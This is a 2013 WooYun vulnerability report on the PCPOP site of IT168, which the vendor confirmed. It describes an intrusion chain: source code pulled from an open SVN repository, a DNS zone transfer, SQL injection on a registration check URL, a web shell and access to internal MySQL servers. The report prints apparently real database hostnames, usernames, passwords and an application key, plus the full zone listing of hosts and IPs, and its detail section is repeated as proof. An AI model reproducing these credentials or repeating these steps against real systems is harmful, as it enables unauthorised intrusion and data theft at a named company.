当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022282

漏洞标题:it168第三弹-PCPOP 数据库链接密码泄露,已shell,可遍历内网数据

相关厂商:IT168.com

漏洞作者: 工作专用

提交时间:2013-04-22 14:02

修复时间:2013-06-06 14:02

公开时间:2013-06-06 14:02

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-22: 细节已通知厂商并且等待厂商处理中
2013-04-22: 厂商已经确认,细节仅向厂商公开
2013-05-02: 细节向核心白帽子及相关领域专家公开
2013-05-12: 细节向普通白帽子公开
2013-05-22: 细节向实习白帽子公开
2013-06-06: 细节向公众公开

简要描述:

各种漏洞综合到一起。齐活!

详细说明:

01.gif


SVN权限为设置 导致下载源码
这里 获得源码以后 开始检查 各个字符连接串等。

define('UC_DBHOST', '10.168.0.37'); // UCenter 数据库主机
define('UC_DBUSER', 'pcpopsns'); // UCenter 数据库用户名
define('UC_DBPW', '951623'); // UCenter 数据库密码
define('UC_DBNAME', 'pop_uc'); // UCenter 数据库名称
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '192.168.1.72:3307');
define('UC_DBUSER', 'yuhui');
define('UC_DBPW', 'it168!@#');
define('UC_DBNAME', 'pop_uc');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`pop_uc`.uc_');
define('UC_DBCONNECT', '0');
define('UC_KEY', '67ed00lqYBYbR3ICfMiLPWaKhxzpdJLau5uEaa4');
define('UC_API', 'http://ucsso.pcpop.com');
define('UC_CHARSET', 'utf-8');
define('UC_IP', '');
define('UC_APPID', '28');
define('UC_PPP', '20');*/
//同步登录 Cookie 设置


获得一堆!
uc.pcpop.com
获得 UC主库的数据库连接字符串。
n个
使用NSLOOKUP 发现存在列域漏洞
挨个测试漏洞吧。、
> ls pcpop.com
pcpop.com. NS server = ns1.pcpop.com
pcpop.com. NS server = ns2.pcpop.com
pcpop.com. A 59.151.37.230
331 A 219.148.35.100
a A 221.192.136.246
*.a A 221.192.136.246
club.a A 219.148.35.85
ad3 A 221.192.136.149
ad4 A 221.192.136.148
android A 219.148.35.25
app A 219.148.35.84
baojia A 219.148.35.191
battery A 219.148.35.96
bbs A 219.148.35.25
anhui.bbs A 219.148.35.25
hebei.bbs A 219.148.35.25
houtai.bbs A 221.192.136.60
img.bbs A 219.148.35.133
bbs2 A 221.192.136.102
bbsdown A 219.148.35.133
bbst A 219.148.35.25
shouji.bbst A 219.148.35.25
bqq A 219.141.178.5
ces A 219.148.35.102
cg A 221.192.136.148
channel A 219.148.35.83
chrome A 219.148.35.69
club A 219.148.35.9
club A 219.148.35.70
comment A 219.148.35.191
comment3 A 219.148.35.191
cool A 221.192.136.149
count A 219.148.35.84
cs A 121.28.95.19
d1 A 219.148.35.129
d1 A 219.148.35.130
dell A 219.148.35.25
dianping A 219.148.35.93
dod A 121.28.95.19
down1 A 219.148.35.133
down2 A 219.148.35.133
down3 A 219.148.35.133
down4 A 219.148.35.133
dx1 A 61.160.192.132
f1 A 219.148.35.83
fan A 121.28.95.19
g A 219.148.35.86
gg A 219.148.35.42
hezi A 219.148.35.218
hptools A 219.148.35.18
hr A 61.55.167.46
iapple A 221.192.136.27
idea A 219.148.35.25
ideabbs A 219.148.35.25
imgpv A 221.192.136.180
imgs A 219.148.35.67
imgs A 219.148.35.68
imgs A 219.148.35.77
ios A 219.148.35.25
jiangjia A 219.148.35.89
l A 219.148.35.89
lephone A 219.148.35.25
live A 219.148.35.69
admin.lixiang A 221.192.136.245
mail A 221.192.136.211
mall A 221.192.136.215
maopao A 219.148.35.102
my A 219.148.35.25
newbbs A 219.148.35.234
ns1 A 221.192.136.150
ns2 A 219.148.35.66
nvidiaclub A 219.148.35.91
open A 219.148.35.70
pao A 219.148.35.25
paoattach A 219.148.35.218
pcmall A 221.192.136.205
pf A 219.148.35.70
ph A 221.192.136.247
photo A 219.148.35.102
pic A 61.182.160.85
play A 221.192.136.159
pmm A 219.148.35.218
pop A 219.148.35.25
group.pop A 219.148.35.93
houtai.pop A 219.148.35.93
houtai2.pop A 219.148.35.93
houtai3.pop A 221.192.136.60
mail.pop A 221.192.136.180
tv.pop A 59.151.39.39
popattach A 61.55.167.199
pp A 221.192.136.148
pp.product A 221.192.136.148
product1 A 219.148.35.89
product2 A 221.192.136.148
pu A 219.148.35.218
publish A 221.192.136.247
q A 219.148.35.91
ren A 221.192.136.246
rtx A 219.141.178.5
s1 A 60.28.208.249
sendmail A 221.192.136.211
sf A 219.148.35.129
sf A 219.148.35.130
*.shop A 219.148.35.83
cnc.shop A 221.192.136.39
com.shop A 219.148.35.83
bbs.smb A 219.148.35.86
smsso A 219.148.35.47
so A 219.148.35.114
img.softbbs A 219.148.35.133
softup A 221.204.242.168
spms A 61.55.167.198
squid A 221.192.136.47
squid2 A 221.192.136.46
sso A 219.148.35.93
svn A 10.168.0.78
taobao A 221.192.136.148
test1 A 221.192.136.180
test2 A 221.192.136.180
test3 A 221.192.136.180
test4 A 221.192.136.15
test5 A 221.192.136.184
testwap A 221.192.136.15
tg A 221.192.136.27
toothbrush A 219.148.35.96
tuan A 219.148.35.102
img.tuan A 219.148.35.25
img1.tuan A 219.148.35.133
uc A 219.148.35.25
vip A 202.106.124.55
wanke A 219.148.35.102
wap A 221.192.136.98
win A 219.148.35.25
woyaoxuan A 219.148.35.218
www1 A 219.148.35.89
zhuanti A 219.148.35.96
到这里发现盒子 注射一枚
http://hezi.pcpop.com/register/CheckCode?invcode=工作专用' 注射

q1.gif


q2.gif


获得SHELL.

3333.jpg


$config['suc']['charset'] = 'UTF-8';
define('UC_DBHOST', '129.0.0.245');
define('UC_DBUSER', 'pcpopsns');
define('UC_DBPW', '951623');
嗯 以上数据库 口令知道了 遍历内网MYSQL。

漏洞证明:

01.gif


SVN权限为设置 导致下载源码
这里 获得源码以后 开始检查 各个字符连接串等。

define('UC_DBHOST', '10.168.0.37'); // UCenter 数据库主机
define('UC_DBUSER', 'pcpopsns'); // UCenter 数据库用户名
define('UC_DBPW', '951623'); // UCenter 数据库密码
define('UC_DBNAME', 'pop_uc'); // UCenter 数据库名称
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '192.168.1.72:3307');
define('UC_DBUSER', 'yuhui');
define('UC_DBPW', 'it168!@#');
define('UC_DBNAME', 'pop_uc');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`pop_uc`.uc_');
define('UC_DBCONNECT', '0');
define('UC_KEY', '67ed00lqYBYbR3ICfMiLPWaKhxzpdJLau5uEaa4');
define('UC_API', 'http://ucsso.pcpop.com');
define('UC_CHARSET', 'utf-8');
define('UC_IP', '');
define('UC_APPID', '28');
define('UC_PPP', '20');*/
//同步登录 Cookie 设置


获得一堆!
uc.pcpop.com
获得 UC主库的数据库连接字符串。
n个
使用NSLOOKUP 发现存在列域漏洞
挨个测试漏洞吧。、

> ls pcpop.com
pcpop.com. NS server = ns1.pcpop.com
pcpop.com. NS server = ns2.pcpop.com
pcpop.com. A 59.151.37.230
331 A 219.148.35.100
a A 221.192.136.246
*.a A 221.192.136.246
club.a A 219.148.35.85
ad3 A 221.192.136.149
ad4 A 221.192.136.148
android A 219.148.35.25
app A 219.148.35.84
baojia A 219.148.35.191
battery A 219.148.35.96
bbs A 219.148.35.25
anhui.bbs A 219.148.35.25
hebei.bbs A 219.148.35.25
houtai.bbs A 221.192.136.60
img.bbs A 219.148.35.133
bbs2 A 221.192.136.102
bbsdown A 219.148.35.133
bbst A 219.148.35.25
shouji.bbst A 219.148.35.25
bqq A 219.141.178.5
ces A 219.148.35.102
cg A 221.192.136.148
channel A 219.148.35.83
chrome A 219.148.35.69
club A 219.148.35.9
club A 219.148.35.70
comment A 219.148.35.191
comment3 A 219.148.35.191
cool A 221.192.136.149
count A 219.148.35.84
cs A 121.28.95.19
d1 A 219.148.35.129
d1 A 219.148.35.130
dell A 219.148.35.25
dianping A 219.148.35.93
dod A 121.28.95.19
down1 A 219.148.35.133
down2 A 219.148.35.133
down3 A 219.148.35.133
down4 A 219.148.35.133
dx1 A 61.160.192.132
f1 A 219.148.35.83
fan A 121.28.95.19
g A 219.148.35.86
gg A 219.148.35.42
hezi A 219.148.35.218
hptools A 219.148.35.18
hr A 61.55.167.46
iapple A 221.192.136.27
idea A 219.148.35.25
ideabbs A 219.148.35.25
imgpv A 221.192.136.180
imgs A 219.148.35.67
imgs A 219.148.35.68
imgs A 219.148.35.77
ios A 219.148.35.25
jiangjia A 219.148.35.89
l A 219.148.35.89
lephone A 219.148.35.25
live A 219.148.35.69
admin.lixiang A 221.192.136.245
mail A 221.192.136.211
mall A 221.192.136.215
maopao A 219.148.35.102
my A 219.148.35.25
newbbs A 219.148.35.234
ns1 A 221.192.136.150
ns2 A 219.148.35.66
nvidiaclub A 219.148.35.91
open A 219.148.35.70
pao A 219.148.35.25
paoattach A 219.148.35.218
pcmall A 221.192.136.205
pf A 219.148.35.70
ph A 221.192.136.247
photo A 219.148.35.102
pic A 61.182.160.85
play A 221.192.136.159
pmm A 219.148.35.218
pop A 219.148.35.25
group.pop A 219.148.35.93
houtai.pop A 219.148.35.93
houtai2.pop A 219.148.35.93
houtai3.pop A 221.192.136.60
mail.pop A 221.192.136.180
tv.pop A 59.151.39.39
popattach A 61.55.167.199
pp A 221.192.136.148
pp.product A 221.192.136.148
product1 A 219.148.35.89
product2 A 221.192.136.148
pu A 219.148.35.218
publish A 221.192.136.247
q A 219.148.35.91
ren A 221.192.136.246
rtx A 219.141.178.5
s1 A 60.28.208.249
sendmail A 221.192.136.211
sf A 219.148.35.129
sf A 219.148.35.130
*.shop A 219.148.35.83
cnc.shop A 221.192.136.39
com.shop A 219.148.35.83
bbs.smb A 219.148.35.86
smsso A 219.148.35.47
so A 219.148.35.114
img.softbbs A 219.148.35.133
softup A 221.204.242.168
spms A 61.55.167.198
squid A 221.192.136.47
squid2 A 221.192.136.46
sso A 219.148.35.93
svn A 10.168.0.78
taobao A 221.192.136.148
test1 A 221.192.136.180
test2 A 221.192.136.180
test3 A 221.192.136.180
test4 A 221.192.136.15
test5 A 221.192.136.184
testwap A 221.192.136.15
tg A 221.192.136.27
toothbrush A 219.148.35.96
tuan A 219.148.35.102
img.tuan A 219.148.35.25
img1.tuan A 219.148.35.133
uc A 219.148.35.25
vip A 202.106.124.55
wanke A 219.148.35.102
wap A 221.192.136.98
win A 219.148.35.25
woyaoxuan A 219.148.35.218
www1 A 219.148.35.89
zhuanti A 219.148.35.96


到这里发现盒子 注射一枚
http://hezi.pcpop.com/register/CheckCode?invcode=工作专用' 注射

q1.gif


q2.gif


获得SHELL.

3333.jpg


$config['suc']['charset'] = 'UTF-8';
define('UC_DBHOST', '129.0.0.245');
define('UC_DBUSER', 'pcpopsns');
define('UC_DBPW', '951623');
嗯 以上数据库 口令知道了 遍历内网MYSQL。

修复方案:

漏洞综合应用!

版权声明:转载请注明来源 工作专用@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-04-22 15:07

厂商回复:

多谢洞主。

最新状态:

暂无